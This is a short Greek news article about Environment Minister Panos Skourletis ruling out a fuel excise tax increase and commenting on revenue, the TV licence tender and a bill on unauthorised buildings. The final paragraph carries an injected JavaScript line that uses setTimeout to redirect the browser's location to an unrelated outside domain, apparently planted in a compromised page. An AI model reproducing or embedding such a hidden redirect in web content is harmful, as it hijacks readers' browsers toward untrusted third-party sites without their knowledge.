Π. Σκουρλέτης: Όχι στην αύξηση του ειδικού φόρου στα καύσιμα

0
13

 

Απέκλεισε το ενδεχόμενο για αύξηση του Ειδικού Φόρου Κατανάλωσης στα καύσιμα ο Πάνος Σκουρλέτης, μιλώντας στην ΕΡΤ.

Ο υπουργός Περιβάλλοντος είπε για τα έσοδα ότι σύμφωνα με το υπουργείο Οικονομικών η πορεία των εσόδων είναι μέσα στους στόχους και μένει να δούμε πως εξελίχθηκαν και τον Αύγουστο που είναι ο μήνας με αύξηση του τουριστικού προϊόντος.

Σε ό,τι αφορά τις τηλεοπτικές άδειες, υποστήριξε ότι ο διαγωνισμός αποτελεί κορυφαία κίνηση για τον περιορισμό της διαπλοκής, για να προσθέσει ότι ο κλειστός αριθμός αδειών προφυλάσσει τη βιωσιμότητα των επιχειρήσεων.

Για τους εργαζόμενους σημείωσε πως υπάρχει η δικλείδα για 400 εργαζομένους πλήρους απασχόλησης και πως το όλο θέμα με τους εργαζόμενους των σταθμών που δεν αδειοδοτήθηκαν θα κριθεί από το ισοζύγιο που θα υπάρξει στο τέλος, καθώς υπάρχουν δύο νέοι σταθμοί που αδειοδοτήθηκαν.

Σχετικά με το νομοσχέδιο που δίνει δυνατότητα νέας ρύθμισης για τα αυθαίρετα είπε ότι όσοι έχουν ενταχθεί σε παλαιότερες μπορούν να υπαχθούν εάν τους συμφέρει στη νέα ρύθμιση.

Ξεκαθάρισε ότι δεν αναγνωρίζονται αυθαίρετα μετά το 2011 και τόνισε πως όσοι έχουν τέτοια αυθαίρετα θα αποδειχθεί ότι θα τους συμφέρει να τα κατεδαφίσουν οι ίδιοι, παρά να τα διατηρήσουν, υπογράμμισε ο κ. Σκουρλέτης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here